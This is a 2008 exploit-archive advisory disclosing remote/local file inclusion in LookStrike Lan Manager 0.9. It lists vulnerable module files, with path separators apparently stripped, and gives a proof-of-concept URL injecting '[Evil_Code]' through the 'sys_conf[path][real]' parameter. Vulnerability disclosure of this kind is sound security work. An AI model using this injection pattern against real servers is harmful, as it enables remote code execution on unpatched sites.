LookStrike Lan Manager 0.9 Remote / Local File Inclusion Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : LookStrike Lan Manager 0.9 Remote / Local File Inclusion Vulnerabilities
# Published : 2008-02-14
# Author : MhZ91
# Previous Title : Joomla Component mediaslide (albumnum) Blind SQL Injection Exploit
# Next Title : Scribe <= 0.2 (index.php page) Local File Inclusion Vulnerability

--==+================================================================================+==--
--==+		LookStrike Lan Manager v0.9 RemoteLocal File Inclusion              +==--
--==+================================================================================+==--

 Author: MhZ91
 Title: LookStrike Lan Manager v0.9 RemoteLocal File Inclusion 
 Download: http://sourceforge.net/project/showfiles.php?group_id=152660
 Bug: RemoteLocal File Inclusion
 Info: LookStrike is a tool written in PHP that manages Lan Party to gain a lot of time about the management of your Lan. You can also gather statistics of your players. LookStrike generate graphics and matches for tournaments automatically.
 Visit: http://www.inj3ct-it.org

[*]----------------------------------------------------------

LookStrike Lan Manager v0.9 present a remotelocal file inclusion vulnerability in this file.. 

modulesclassTable.php
modulesclassdbdb_admins.php
modulesclassdbdb_alert.php
modulesclassdbdb_double.php
modulesclassdbdb_games.php
modulesclassdbdb_matches.php
modulesclassdbdb_match_teams.php
modulesclassdbdb_news.php
modulesclassdbdb_platform.php
modulesclassdbdb_players.php
modulesclassdbdb_server_group.php
modulesclassdbdb_server_ip.php
modulesclassdbdb_teams.php
modulesclassdbdb_team_players.php
modulesclassdbdb_tournaments.php
modulesclassdbdb_tournament_teams.php
modulesclassdbdb_trees.php
modulesclasstournamentMatch.php
modulesclasstournamentMatchTeam.php
modulesclasstournamentRule.php
modulesclasstournamentRuleBuilder.php
modulesclasstournamentRulePool.php
modulesclasstournamentRuleSingle.php
modulesclasstournamentRuleTree.php
modulesclasstournamentTournament.php
modulesclasstournamentTournamentTeam.php
modulesclasstournamentTree.php
modulesclasstournamentTreeSingle.php

all are exploitable by the variable "sys_conf[path][real]" for example

http://www.example.com/modules/class/Table.php?sys_conf[path][real]=[Evil_Code]


[*]----------------------------------------------------------

# www.Syue.com [2008-02-14]